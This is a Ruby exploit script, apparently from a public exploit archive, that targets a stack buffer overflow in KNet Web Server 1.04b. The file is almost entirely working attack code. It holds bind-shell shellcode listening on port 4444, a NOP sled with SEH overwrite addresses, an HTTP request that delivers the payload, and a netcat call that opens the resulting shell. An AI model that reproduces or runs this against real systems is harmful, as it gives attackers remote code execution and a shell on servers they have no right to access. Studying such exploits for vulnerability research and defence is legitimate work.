#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH # Date: 2013-03-27 # Exploit Author: Myo Soe, http://yehg.net/ # Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html # Version: KNet 1.04b # Tested on: Windows 7
require 'net/http' require 'uri' require 'socket' ############################################
# bind port 4444 sc_bind = "\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" + "\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" + "\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" + "\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" + "\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" + "\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" + "\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" + "\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" + "\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" + "\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" + "\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" + "\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" + "\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" + "\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" + "\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" + "\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" + "\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" + "\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" + "\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" + "\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" + "\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" + "\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" + "\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" + "\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" + "\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" + "\x6c\x19\x5f\x09"
###########################################
sploit = "\x90" * 1234 sploit += "\xFF\x64\x24\x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C sploit += "\xE3\x74\x24\x6C" # seh | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll] sploit += "\x90" * 80
sploit += sc_bind sploit += "\x90" * 80
########################################
puts "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n" target = ARGV[0]
def exploit(t,s) target = 'http://' + t sploit = s puts "[*] Sending exploit to #{target}...\n" url = URI.parse(target) res = Net::HTTP.start(url.host, url.port) {|http| http.get('/' + sploit) } end def connect(t) sleep(1) target = t puts "[*] Opening Shell ..\n\n"; system("nc #{target} 4444") end t1=Thread.new{exploit(target,sploit)} t2=Thread.new{connect(target)} t1.join t2.join
|